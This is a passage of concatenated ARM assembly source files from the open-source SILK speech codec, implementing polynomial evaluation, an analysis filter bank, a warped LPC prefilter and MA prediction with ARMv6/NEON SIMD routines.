COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=6
VARDEF y32, r3
VARDEF pn1, r4
VARDEF pn2, r5
VARDEF lo, r6
VARDEF hi, r8
.globl SYM(SKP_Silk_A2NLSF_eval_poly)
SYM(SKP_Silk_A2NLSF_eval_poly):
stmdb sp!, {r4-r8, fp, ip, lr}
add fp, sp, #28
add r0, r0, r2, lsl #2
ldr y32, [r0], #-4
tst r2, #1
beq LR(1, f)
ldr pn1, [r0], #-4
sub r2, r2, #1
mov r1, r1, lsl #4
L(0)
smull lo, hi, y32, r1
subs r2, r2, #1
add y32, pn1, hi, lsl #16
ldr pn1, [r0], #-4
add y32, y32, lo, lsr #16
bgt LR(0, b)
smull lo, hi, y32, r1
add y32, pn1, hi, lsl #16
add r0, y32, lo, lsr #16
ldmia sp!, {r4-r8, fp, ip, pc}
L(1)/*EVEN:*/
add r0, r0, #4
ldmdb r0!, {pn1, pn2}
sub r2, r2, #2
mov r1, r1, lsl #4
L(0)
smull lo, hi, y32, r1
subs r2, r2, #2
add y32, pn2, hi, lsl #16
add y32, y32, lo, lsr #16
smull lo, hi, y32, r1
add y32, pn1, hi, lsl #16
ldmdb r0!, {pn1, pn2}
add y32, y32, lo, lsr #16
bgt LR(0, b)
smull lo, hi, y32, r1
add y32, pn2, hi, lsl #16
add y32, y32, lo, lsr #16
smull lo, hi, y32, r1
add y32, pn1, hi, lsl #16
add r0, y32, lo, lsr #16
ldmia sp!, {r4-r8, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 5,894 | silk/src/SKP_Silk_ana_filt_bank_1_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
/*
* void SKP_Silk_ana_filt_bank_1(
* const SKP_int16 *in, I: Input signal [N]
* SKP_int32 *S, I/O: State vector [2]
* SKP_int16 *outL, O: Low band [N/2]
* SKP_int16 *outH, O: High band [N/2]
* SKP_int32 *scratch, I: Scratch memory [3*N/2]
* const SKP_int32 N I: Number of input samples
* )
*/
VARDEF ptr_in_lo, r0
VARDEF ptr_in_hi, r3
VARDEF val_in_lo, sb
VARDEF val_in_hi, sl
VARDEF ptr_scratch, r4
VARDEF ptr_scratch_N, r1
VARDEF ptr_scratch_halfN, r2
VARDEF idx_k, ip
VARDEF val_N, r8
VARDEF val_halfN, r8
VARDEF val_scratch1, r5
VARDEF val_scratch2, r6
VARDEF ptr_out_lo, r5
VARDEF ptr_out_hi, r6
VARDEF ptr_s, _r7
VARDEF val_const1, r2
VARDEF val_const2, ip // 0x03FF F800
VARDEF val_const3, sl // 0x0000 7FFF
VARDEF val_const4, lr // 0xFFFF 8000
VARDEF idx_k2, r8
VARDEF ptr_scratch_halfN_2, r3
VARDEF val_scratch3, r0
VARDEF val_scratch4, r1
VARDEF out_tmpla, sb
VARDEF out_tmplb, r2
VARDEF out_tmpha, r0
VARDEF out_tmphb, _r7
.set halfN, 0
.set sp_ptr_out_lo, 4
.set sp_ptr_out_hi, 8
EXTERN SYM(SKP_Silk_allpass_int)
.globl SYM(SKP_Silk_ana_filt_bank_1)
SYM(SKP_Silk_ana_filt_bank_1):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #12
.set arg_scratch, 52
.set arg_N, 56
ldr ptr_scratch, [sp, #arg_scratch]
ldr val_N, [sp, #arg_N]
str r2, [sp, #sp_ptr_out_lo]
str r3, [sp, #sp_ptr_out_hi]
mov ptr_s, r1
mov val_halfN, val_N, asr #1
sub idx_k, val_halfN, #1
add ptr_in_hi, ptr_in_lo, #2
str val_halfN, [sp, #halfN]
ldrsh val_in_lo, [ptr_in_lo], #4
ldrsh val_in_hi, [ptr_in_hi], #4
add ptr_scratch_N, ptr_scratch, val_halfN, lsl #3
add ptr_scratch_halfN, ptr_scratch, val_halfN, lsl #2
L(0)
mov val_scratch1, val_in_lo, lsl #10
mov val_scratch2, val_in_hi, lsl #10
ldrsh val_in_lo, [ptr_in_lo], #4
ldrsh val_in_hi, [ptr_in_hi], #4
subs idx_k, idx_k, #1
str val_scratch1, [ptr_scratch_N], #4
str val_scratch2, [ptr_scratch_halfN], #4
bgt LR(0, b)
mov val_scratch1, val_in_lo, lsl #10
mov val_scratch2, val_in_hi, lsl #10
str val_scratch1, [ptr_scratch_N], #4
str val_scratch2, [ptr_scratch_halfN], #4
mov val_const1, #0x1500
add r0, ptr_scratch, val_halfN, lsl #2
add r1, ptr_s, #4
add val_const1, val_const1, #0x12
mov r3, ptr_scratch
bl SYM(SKP_Silk_allpass_int)
mov val_const1, #0x5000
add r0, ptr_scratch, val_halfN, lsl #3
mov r1, ptr_s
add val_const1, val_const1, #0x8F
add r3, ptr_scratch, val_halfN, lsl #2
bl SYM(SKP_Silk_allpass_int)
mvn val_const2, #0x80000000
add ptr_scratch_halfN_2, ptr_scratch, val_halfN, lsl #2
mov val_const3, val_const2, asr #16
rsb val_const4, val_const3, #0
mov idx_k2, val_halfN
mov val_const2, val_const3, lsl #11
ldr ptr_out_lo, [sp, #sp_ptr_out_lo]
ldr ptr_out_hi, [sp, #sp_ptr_out_hi]
L(1)
ldr val_scratch3, [ptr_scratch], #4
ldr val_scratch4, [ptr_scratch_halfN_2], #4
add out_tmpla, val_scratch3, val_scratch4
sub out_tmpha, val_scratch3, val_scratch4
add out_tmplb, out_tmpla, #1024
add out_tmphb, out_tmpha, #1024
mov out_tmplb, out_tmplb, asr #11
mov out_tmphb, out_tmphb, asr #11
strh out_tmplb, [ptr_out_lo], #2
strh out_tmphb, [ptr_out_hi], #2
#ifdef _WINRT
cmp out_tmpla, val_const2
ble LR(2, f)
strh val_const3, [ptr_out_lo, #-2]
L(2)
cmn out_tmpla, val_const2
bge LR(2, f)
strh val_const4, [ptr_out_lo, #-2]
L(2)
cmp out_tmpha, val_const2
ble LR(2, f)
strh val_const3, [ptr_out_hi, #-2]
L(2)
cmn out_tmpha, val_const2
bge LR(2, f)
strh val_const4, [ptr_out_hi, #-2]
L(2)
#else
cmp out_tmpla, val_const2
strgth val_const3, [ptr_out_lo, #-2]
cmn out_tmpla, val_const2
strlth val_const4, [ptr_out_lo, #-2]
cmp out_tmpha, val_const2
strgth val_const3, [ptr_out_hi, #-2]
cmn out_tmpha, val_const2
strlth val_const4, [ptr_out_hi, #-2]
#endif
subs idx_k2, idx_k2, #1
bgt LR(1, b)
add sp, sp, #12
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 4,326 | silk/src/SKP_Silk_prefilter_FIX_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#include "SKP_Silk_AsmPreproc.h"
#if ( EMBEDDED_ARM >= 6 )
VARDEF ptr_state, r0
VARDEF ptr_res, r1
VARDEF val_tmp2, r1
VARDEF val_state0, r1
VARDEF ptr_coef, r2
VARDEF ptr_input, r3
VARDEF val_tmp, r3
VARDEF val_lambda, r4
VARDEF val_state1, r5
VARDEF val_state2, r6
VARDEF val_tmp1, _r7
VARDEF val_coef, r8
VARDEF val_input, sb
VARDEF val_acc, sl
VARDEF val_order, ip
VARDEF val_length, lr
.set sp_state_ptr, 0
.set sp_res_ptr, 4
.set sp_coef_Q13_ptr, 8
.set sp_input_ptr, 12
.globl SYM(SKP_Silk_warped_LPC_analysis_filter_FIX)
SYM(SKP_Silk_warped_LPC_analysis_filter_FIX):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #16
.set ptr_lambda_Q16, 56
.set ptr_length, 60
.set ptr_order, 64
str r0, [sp, #sp_state_ptr]
str r1, [sp, #sp_res_ptr]
str r2, [sp, #sp_coef_Q13_ptr]
str r3, [sp, #sp_input_ptr]
ldr val_lambda, [sp, #ptr_lambda_Q16]
ldr val_length, [sp, #ptr_length]
/*OUTTER_LOOP*/
L(1)
ldmia ptr_state, {val_state0, val_state1, val_state2}
ldrsh val_input, [ptr_input], #2
ldrh val_coef, [ptr_coef], #2
ldr val_order, [sp, #ptr_order]
smlawb val_tmp2, val_state1, val_lambda, val_state0
str ptr_input, [sp, #sp_input_ptr]
mov val_tmp1, val_input, lsl #14
sub val_tmp, val_state2, val_tmp2
str val_tmp1, [ptr_state], #4
str val_tmp2, [ptr_state], #4
smlawb val_tmp1, val_tmp, val_lambda, val_state1
smulwb val_acc, val_tmp2, val_coef
sub val_order, val_order, #2
/*INNER_LOOP*/
L(0)
ldrh val_coef, [ptr_coef], #2
ldr val_state1, [ptr_state, #4]
str val_tmp1, [ptr_state], #4
smlawb val_acc, val_tmp1, val_coef, val_acc
sub val_tmp, val_state1, val_tmp1
smlawb val_tmp2, val_tmp, val_lambda, val_state2
ldrh val_coef, [ptr_coef], #2
ldr val_state2, [ptr_state, #4]
str val_tmp2, [ptr_state], #4
subs val_order, val_order, #2
smlawb val_acc, val_tmp2, val_coef, val_acc
sub val_tmp, val_state2, val_tmp2
smlawb val_tmp1, val_tmp, val_lambda, val_state1
bgt LR(0, b)
str val_tmp1, [ptr_state]
ldrh val_coef, [ptr_coef], #2
ldr ptr_res, [sp, #sp_res_ptr]
ldr ptr_input, [sp, #sp_input_ptr]
ldr ptr_coef, [sp, #sp_coef_Q13_ptr]
ldr ptr_state, [sp, #sp_state_ptr]
smlawb val_acc, val_tmp1, val_coef, val_acc
mov val_acc, val_acc, asr #10
add val_acc, val_acc, #1
mov val_acc, val_acc, asr #1
sub val_input, val_input, val_acc
ssat val_input, #16, val_input
strh val_input, [ptr_res], #2
subs val_length, val_length, #1
str ptr_res, [sp, #sp_res_ptr]
bgt LR(1, b)
add sp, sp, #16
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
|
open-vela/external_silk-v3-decoder | 47,507 | silk/src/SKP_Silk_MA_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=7
VARDEF val_order, r5
VARDEF val_len, r4
VARDEF tmp_len, r5
.set sp_ptr_in, 0
.set sp_ptr_B, 4
.set sp_ptr_S, 8
.set sp_ptr_out, 12
.globl SYM(SKP_Silk_MA_Prediction)
SYM(SKP_Silk_MA_Prediction):
stmdb sp!, {r4-r10, fp, ip, lr}
vpush {q0-q7}
vpush {q8-q11}
add fp, sp, #228
sub sp, sp, #16
.set arg_len, 248
.set arg_order, 252
/*LOAD INPUT ARGS*/
ldr val_order, [sp, #arg_order] /*order*/
ldr val_len, [sp, #arg_len] /*len*/
ands _r7, r1, #3 /*CHECK: if ( B is 4 byte aligned ) Prerequest for ARMv6 SIMD*/
bne LR(2, f)
ands r6, val_order, #1 /*CHECK: if ( order % 2 == 0 ) Prerequest for ARMv6 SIMD*/
bne LR(2, f)
cmp val_order, #8 /*CHECK: if ( order == 8 ) ARMv7 SIMD*/
beq LR(5, f)/*SYM(SKP_Silk_MA_Prediction_ARMv7_order8)*/
cmp val_order, #12 /*CHECK: if ( order == 12 ) ARMv7 SIMD*/
beq LR(6, f)/*SYM(SKP_Silk_MA_Prediction_ARMv7_order12)*/
cmp val_order, #16 /*CHECK: if ( order == 16 ) ARMv7 SIMD*/
beq LR(7, f)/*SYM(SKP_Silk_MA_Prediction_ARMv7_order16)*/
cmp val_order, #6 /*CHECK: if ( order >= 6 ) Prerequest for ARMv6 SIMD*/
blt LR(2, f)
VARDEF ptr1_in, sb
VARDEF ptr1_out, sl
VARDEF ptr1_S, ip
VARDEF ptr1_B, lr
VARDEF val1_in, r0
VARDEF val1_B, r6
VARDEF val1_S0, r1
VARDEF val1_S1, r2
VARDEF val1_S2, r3
VARDEF val1_SO1, _r7
VARDEF val1_SO2, r8
VARDEF val1_out, r1
VARDEF val1_tmp, r3
// ARMv6 SIMD
// order % 2 == 0
str r0, [sp, #sp_ptr_in]
str r1, [sp, #sp_ptr_B]
str r2, [sp, #sp_ptr_S]
str r3, [sp, #sp_ptr_out]
mov ptr1_in, r0 /*in*/
mov ptr1_out, r3 /*out*/
L(0)
ldr ptr1_S, [sp, #sp_ptr_S] /*S*/
ldr ptr1_B, [sp, #sp_ptr_B] /*B*/
ldrsh val1_in, [ptr1_in], #2 /*in[k]*/
ldr val1_S0, [ptr1_S], #4 /*S[0]*/
ldr val_order, [sp, #arg_order] /*order*/
ldr val1_S1, [ptr1_S], #4 /*S[1]*/
rsb val1_tmp, val1_S0, val1_in, lsl #12 /*SKP_LSHIFT(in16, 12) - S[0]*/
ldr val1_B, [ptr1_B], #4 /*B[0], B[1]*/
mov val1_tmp, val1_tmp, asr #11
sub val_order, val_order, #4 /*order - 2 - 2*/
add val1_out, r3, #1 /*SKP_RSHIFT_ROUND*/
ldr val1_S2, [ptr1_S], #4 /*S[2]*/
ssat val1_out, #16, val1_out, asr #1 /*SKP_SAT16( out32 )*/
strh val1_out, [ptr1_out], #2 /*save it to out[k]*/
L(1)
smlabb val1_SO1, val1_in, val1_B, val1_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smlabt val1_SO2, val1_in, val1_B, val1_S2 /*SKP_SMLABT(S[d + 2], in16, B32)*/
ldr val1_S1, [ptr1_S], #4 /*S[d+1]*/
ldr val1_S2, [ptr1_S], #-16 /*S[d+2]*/
ldr val1_B, [ptr1_B], #4 /*B[d], B[d+1]*/
subs val_order, val_order, #2
str val1_SO1, [ptr1_S], #4
str val1_SO2, [ptr1_S], #16
bgt LR(1, b)
smlabb val1_SO1, val1_in, val1_B, val1_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smlabt val1_SO2, val1_in, val1_B, val1_S2 /*SKP_SMLABT(S[d + 2], in16, B32)*/
ldr val1_S1, [ptr1_S], #-12 /*S[d+1]*/
ldr val1_B, [ptr1_B] /*B[d], B[d+1]*/
str val1_SO1, [ptr1_S], #4
str val1_SO2, [ptr1_S], #4
smlabb val1_SO1, val1_in, val1_B, val1_S1 /*SKP_SMLABB(S[d + 1], in16, B32)*/
smulbt val1_SO2, val1_in, val1_B /*SKP_SMLABT(S[d + 2], in16, B32)*/
subs val_len, val_len, #1
str val1_SO1, [ptr1_S], #4
str val1_SO2, [ptr1_S]
bgt LR(0, b)
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEF ptr2_in, r6
VARDEF ptr2_out, sb
VARDEF val2_S0, lr
VARDEF ptr2_B, _r7
VARDEF ptr2_S, r8
VARDEF val2_in, r0
VARDEF val2_B, r2
VARDEF val2_B1, r1
VARDEF val2_S1, r3
VARDEF val2_out, r1
VARDEF val2_S2, r2
// order % 2 != 0
L(2)
add r2, r2, #4
str r0, [sp, #sp_ptr_in]
str r1, [sp, #sp_ptr_B]
str r2, [sp, #sp_ptr_S]
str r3, [sp, #sp_ptr_out]
mov ptr2_in, r0 /*in_ptr*/
mov ptr2_out, r3 /*out_ptr*/
ldr val2_S0, [r2, #-4] /*S0*/
L(0)
ldrsh val2_in, [ptr2_in], #2 /*in[k]*/
ldr val_order, [sp, #arg_order] /*order*/
ldr ptr2_B, [sp, #sp_ptr_B]
ldr ptr2_S, [sp, #sp_ptr_S] /*S_ptr*/
rsb val2_out, val2_S0, val2_in, lsl #12
ldrsh val2_in, [ptr2_B], #2
mov val2_out, val2_out, asr #11
ldr val2_S1, [ptr2_S]
add val2_out, val2_out, #1
smlabb val2_S0, val2_in, val2_in, val2_S1
ssat val2_out, #16, val2_out, asr #1
sub val_order, val_order, #3
ldr val2_S1, [ptr2_S, #4]
strh val2_out, [ptr2_out], #2
ldrsh val2_B1, [ptr2_B], #2
L(1)
smlabb val2_S2, val2_in, val2_B1, val2_S1
ldr val2_S1, [ptr2_S, #8]
ldrsh val2_B1, [ptr2_B], #2
str val2_S2, [ptr2_S], #4
subs val_order, val_order, #1
bgt LR(1, b)
smlabb val2_S2, val2_in, val2_B1, val2_S1
ldrsh val2_B1, [ptr2_B], #2
str val2_S2, [ptr2_S], #4
smulbb val2_S2, val2_in, val2_B1
subs val_len, val_len, #1
str val2_S2, [ptr2_S]
bgt LR(0, b)
ldr val2_S2, [sp, #sp_ptr_S]
str val2_S0, [r2, #-4]
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*SYM(SKP_Silk_MA_Prediction_ARMv7_order8):*/
L(5)
VARDEF ptr3_in, sb
VARDEF ptr3_out, sl
VARDEF val3_rS0, r6
VARDEF const3_2048, r3
VARDEF val3_in0, r0
VARDEF val3_in1, r1
VARDEF val3_out32, r8
VARDEFD val3_B0_lo, d0
VARDEFD val3_b0_hi, d1
VARDEFQ val3_S0, q2
VARDEFD val3_S0_lo, d4
VARDEFD val3_S0_hi, d5
VARDEFQ val3_S1, q3
VARDEFD val3_S1_lo, d6
VARDEFD val3_S1_hi, d7
VARDEFQ val3_S2_zero, q4
VARDEFQ val3_S_0, q5
VARDEFQ const3, q7
VARDEFQ val3_in, q1
VARDEFD val3_in_lo, d2
VARDEFD val3_in_hi, d3
VARDEFQ val3_out, q6
VARDEFD val3_out_lo, d12
VARDEFD val3_out_hi, d13
str r0, [sp, #sp_ptr_in]
str r1, [sp, #sp_ptr_B]
str r2, [sp, #sp_ptr_S]
str r3, [sp, #sp_ptr_out]
cmp val_len, #4
mov ptr3_in, r0
mov ptr3_out, r3
ldr val3_rS0, [r2]
vld1.16 {val3_B0_lo, val3_b0_hi}, [r1] /*read all B*/
vld1.32 {val3_S0_lo, val3_S0_hi, val3_S1_lo, val3_S1_hi}, [r2] /*read all S*/
vmov.i32 val3_S2_zero, #0 /*clear q4*/
mov const3_2048, #2048 /*r3 = 1 << 11, will be used for rounding.*/
and tmp_len, val_len, #3 /*r5 = r4 % 4 ==> numbers in second loop*/
blt LR(3, f)
vdup.32 const3, const3_2048 /*d12 = [2048] [2048]*/
sub val_len, val_len, #4
L(2) // Input/Ouput are processed SI4D
ldrsh val3_in0, [ptr3_in], #2 /*in[k]*/
ldrsh val3_in1, [ptr3_in], #2
vext.32 val3_S_0, val3_S_0, val3_S0, #1 /*shift S[2k] in */
vdup.16 val3_in, val3_in0 /*mov r0 to q1(d2, d3)*/
vext.32 val3_S0, val3_S0, val3_S1, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val3_S1, val3_S1, val3_S2_zero, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vmlal.s16 val3_S0, val3_B0_lo, val3_in_lo /*calculate S[0-3]*/
vmlal.s16 val3_S1, val3_b0_hi, val3_in_hi /*calculate S[4-7]*/
vmov val3_out_lo, val3_in0, val3_in1 /*in[2k], in[2k]+1*/
vext.32 val3_S_0, val3_S_0, val3_S0, #1 /*shift S[2k] in */
vdup.16 val3_in, val3_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val3_S0, val3_S0, val3_S1, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val3_S1, val3_S1, val3_S2_zero, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vmlal.s16 val3_S0, val3_B0_lo, val3_in_lo /*calculate S[0-3]*/
vmlal.s16 val3_S1, val3_b0_hi, val3_in_hi /*calculate S[4-7]*/
ldrsh val3_in0, [ptr3_in], #2 /*in[k]*/
ldrsh val3_in1, [ptr3_in], #2
vext.32 val3_S_0, val3_S_0, val3_S0, #1 /*shift S[2k] in */
vdup.16 val3_in, val3_in0 /*mov r0 to q1(d2, d3)*/
vext.32 val3_S0, val3_S0, val3_S1, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val3_S1, val3_S1, val3_S2_zero, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vmlal.s16 val3_S0, val3_B0_lo, val3_in_lo /*calculate S[0-3]*/
vmlal.s16 val3_S1, val3_b0_hi, val3_in_hi /*calculate S[4-7]*/
vmov val3_out_hi, val3_in0, val3_in1 /*in[2k], in[2k]+1*/
vext.32 val3_S_0, val3_S_0, val3_S0, #1 /*shift S[2k] in */
vdup.16 val3_in, val3_in1 /*mov r0 to q1(d2, d3)*/
vext.32 val3_S0, val3_S0, val3_S1, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val3_S1, val3_S1, val3_S2_zero, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vmlal.s16 val3_S0, val3_B0_lo, val3_in_lo /*calculate S[0-3]*/
vmlal.s16 val3_S1, val3_b0_hi, val3_in_hi /*calculate S[4-7]*/
vshl.s32 val3_out, val3_out, #12 /*SKP_LSHIFT(in16, 12)*/
vsub.s32 val3_out, val3_out, val3_S_0 /*SKP_LSHIFT(in16, 12) - S[0]*/
vqadd.s32 val3_out, val3_out, const3 /*qadd out32, out32, LR(0, x)2048*/
vqshrn.s32 d10, val3_out, #12
subs val_len, val_len, #4
vst1.16 d10, [ptr3_out]!
bge LR(2, b)
cmp tmp_len, #0
beq LR(4, f)
vst1.32 val3_S0_lo, [sp]
ldr val3_rS0, [sp] /*r6 = new [S0]*/
L(3) // Input/Ouput are processed 1 by 1
L(0)
ldrsh val3_in0, [ptr3_in], #2 /*in[k]*/
vext.32 val3_S0, val3_S0, val3_S1, #1 /*shift q2 by 32bit and put 32-lsb of q3 to 32-msb q2*/
vext.32 val3_S1, val3_S1, val3_S2_zero, #1 /*shift q3 by 32bit and put 32-lsb of q4 to 32-msb q3*/
vdup.16 val3_in, val3_in0 /*mov r0 to q1(d2, d3)*/
rsb val3_out32, val3_rS0, r0, lsl #12 /*out32 = SKP_LSHIFT(in16, 12) - S[0];*/
vmlal.s16 val3_S0, val3_B0_lo, val3_in_lo /*calculate S[0-3]*/
vmlal.s16 val3_S1, val3_b0_hi, val3_in_hi /*calculate S[4-7]*/
vst1.32 val3_S0_lo, [sp]
qadd val3_out32, val3_out32, const3_2048
ssat val3_out32, #16, val3_out32, asr #12 /*out = round and sat*/
subs tmp_len, tmp_len, #1
strh val3_out32, [ptr3_out], #2
ldr val3_rS0, [sp] /*r6 = new [S0]*/
bgt LR(0, b)
L(4)
vst1.32 {val3_S0_lo, val3_S0_hi, val3_S1_lo, val3_S1_hi}, [r2]
add sp, sp, #16
vpop {q8-q11}
vpop {q0-q7}
ldmia sp!, {r4-r10, fp, ip, pc}
/*SYM(SKP_Silk_MA_Prediction_ARMv7_order16):*/
L(7)
VARDEF ptr4_in, sb
VARDEF ptr4_out, sl
VARDEF val4_rS0, r6
VARDEF const4_2048, r3
VARDEF val4_in0, r0
VARDEF val4_in1, r1
VARDEF val4_out32, r8
VARDEFD val4_B0_lo, d0
VARDEFD val4_B0_hi, d1
VARDEFD val4_B1_lo, d2
VARDEFD val4_B1_hi, d3
VARDEFQ val4_S1, q2
VARDEFD val4_S1_lo, d4
VARDEFD val4_S1_hi, d5
VARDEFQ val4_S2, q3
VARDEFD val4_S2_lo, d6
VARDEFD val4_S2_hi, d7
VARDEFQ val4_S3, q4
VARDEFD val4_S3_lo, d8
VARDEFD val4_S3_hi, d9
VARDEFQ val4_S4, q5
VARDEFD val4_S4_lo, d10
VARDEFD val4_S4_hi, d11
VARDEFQ val4_S5, q6
VARDEFQ val4_S0, q8
VARDEFD val4_S0_lo, d16
VARDEFQ val4_in, q9
VARDEFD val4_in_lo, d18
VARDEFD val4_in_hi, d19
VARDEFQ val4_out, q10
VARDEFD val4_out_lo, d20
VARDEFD val4_out_hi, d21
VARDEFQ val4_const, q7
str r0, [sp, #sp_ptr_in]
str r1, [sp, #sp_ptr_B]
str r2, [sp, #sp_ptr_S]
str r3, [sp, #sp_ptr_out]
cmp val_len, #4
mov ptr4_in, r0 /*in*/
mov ptr4_out, r3 /*out*/
ldr val4_rS0, [r2] /*r6 = S[0]*/
vld1.16 {val4_B0_lo, val4_B0_hi, val4_B1_lo, val4_B1_hi}, [r1] /*read all 16 Bs*/
vld1.32 {val4_S1_lo, val4_S1_hi, val4_S2_lo, val4_S2_hi}, [r2]! /*read first 16 Ss*/
